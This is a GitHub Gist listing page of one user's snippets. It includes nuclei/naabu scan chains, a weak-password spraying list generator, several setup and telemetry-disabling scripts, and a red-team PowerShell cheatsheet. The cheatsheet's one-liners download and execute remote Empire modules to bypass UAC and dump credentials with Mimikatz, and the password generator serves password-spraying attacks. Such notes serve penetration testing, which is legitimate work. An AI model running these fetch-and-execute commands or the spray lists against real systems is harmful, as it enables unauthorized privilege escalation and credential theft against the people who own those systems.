Skip to content

Instantly share code, notes, and snippets.

View moscowchill's full-sized avatar

moscowchill moscowchill

View GitHub Profile
@moscowchill
moscowchill / pdcheats.txt
Last active October 21, 2024 09:15
arsenal cheats for some pd tools
# projectdiscovery
#platform/linux #target/remote #cat/RECON #tag/scan
## ProjectDiscovery - intern top/100 nuclei killchain
```
sudo /home/kali/go/bin/naabu -host <ip_range> -p 8080,10000,20000,2222,7080,9009,7443,2087,2096,8443,4100,2082,2083,2086,9999,2052,9001,9002,7000,7001,8082,8084,8085,8010,9000,2078,2080,2079,2053,2095,4000,5280,8888,9443,5800,631,8000,8008,8087,84,85,86,88,10125,9003,7071,8383,7547,3434,10443,8089,3004,81,4567,7081,82,444,1935,3000,9998,4433,4431,4443,83,90,8001,8099,80,300,443,591,593,832,981,1010,1311,2480,3128,3333,4243,4711,4712,4993,5000,5104,5108,6543,7396,7474,8014,8042,8069,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8500,8834,8880,8983,9043,9060,9080,9090,9091,9200,9800,9981,12443,16080,18091,18092,20720,28017 -silent -stats | httpx -silent -o <output_file> | nuclei -s low,medium,high,critical -o <output_file>
```
## ProjectDiscovery - targets file top/100 nuclei killchain
```
@moscowchill
moscowchill / weakpassgen.py
Created October 14, 2024 14:02
weakpass generator by nyxgeek
#!/usr/bin/env python3
# 2020.02.18 - @nyxgeek - TrustedSec
# generate weak passwords based on current date
import datetime
from datetime import datetime, timedelta
import argparse
parser = argparse.ArgumentParser(description='Maakt password spraying list en schijft naar latest_passwords.txt (zonder argumenten)')
parser.add_argument('-u', '--uitgebreid', dest='uitgebreid', action='store_true', help='Maakt de lijst uitgebreider')
parser.add_argument('-l', '--lamer', dest='dolame', action='store_true', help='l33tspeak transmutate output')
@moscowchill
moscowchill / disablewin-Telemetry.cmd
Created June 2, 2024 12:04
disablewin-Telemetry.cmd
@echo off
echo.
openfiles > NUL 2>&1
if %errorlevel% NEQ 0 (
echo You are not running as Administrator...
echo This batch cannot do it's job without elevation!
echo.
echo Right-click and select ^'Run as Administrator^' and try again...
echo.
@moscowchill
moscowchill / pdchain.sh
Created April 30, 2024 11:59
PD Nuclei domain chain
#!/bin/bash
# Function to check if directory exists
create_directory_if_not_exist() {
if [ ! -d "$1" ]; then
mkdir -p "$1"
fi
}
BASE_DIR="${HOME}/Project/ext_active"
@moscowchill
moscowchill / dockerinstall.sh
Created April 30, 2024 11:56
DockerInstall.sh
#!/bin/bash
# Remove any old versions
for pkg in docker.io docker-doc docker-compose docker-compose-v2 podman-docker containerd runc; do
sudo apt-get remove -y $pkg
done
# Update package index and install prerequisites
sudo apt-get update
sudo apt-get install -y ca-certificates curl
@moscowchill
moscowchill / shellfix.sh
Created April 2, 2024 09:11
Fix bash shell by installing zsh and autojump,autosuggest & agnoster
#!/bin/bash
# Function to install Oh My Zsh
install_oh_my_zsh() {
# Check if Zsh is installed
if ! command -v zsh &> /dev/null; then
echo "Zsh is not installed. Installing Zsh..."
sudo apt-get update
sudo apt-get install -y zsh
fi
@moscowchill
moscowchill / telemetry_off.sh
Created April 2, 2024 08:57
Ubuntu telemetry disable bash script
#!/usr/bin/env bash
################ Description: ###################
# This script will disable all opt-out under
# Ubuntu 22.04 (Codename: Jammy Jellyfish).
# At first the telemetry domains will be resolved
# to the local host and second all telemetry services
# will be removed from the system.
# The following work has a system-wide effect not just
@moscowchill
moscowchill / mmserversetup.sh
Last active April 2, 2024 09:28
Mattermost & DB Setup Script
#!/bin/bash
# Mattermost and PostgreSQL Installation Script
#
# This script automates the installation of Mattermost and PostgreSQL on an Ubuntu server.
# It sets up a PostgreSQL database and prepares the Mattermost environment but does not start or enable the Mattermost service.
# This is to ensure that Mattermost is not started before its configuration, especially database settings, is properly completed.
#
# How to Use This Script:
# 1. Database Password: Change 'mmuser-password' to a strong, secure password of your choice.
@moscowchill
moscowchill / zond-setup.sh
Last active November 18, 2024 15:35
Bash zond setup script
#!/bin/bash
GREEN="\e[32m"
RESET="\e[0m"
green_echo() {
echo -e "${GREEN}$1${RESET}"
}
green_echo "[+] Currently not zsh compatible run as bash zond-setup.sh"
green_echo "[+] This currently assumes Go is not already installed on the system"
@moscowchill
moscowchill / pentesting_cheatsheet.ps1
Last active July 27, 2024 09:42
Intern Pentesting notes
[+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
#Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
#Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
#Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"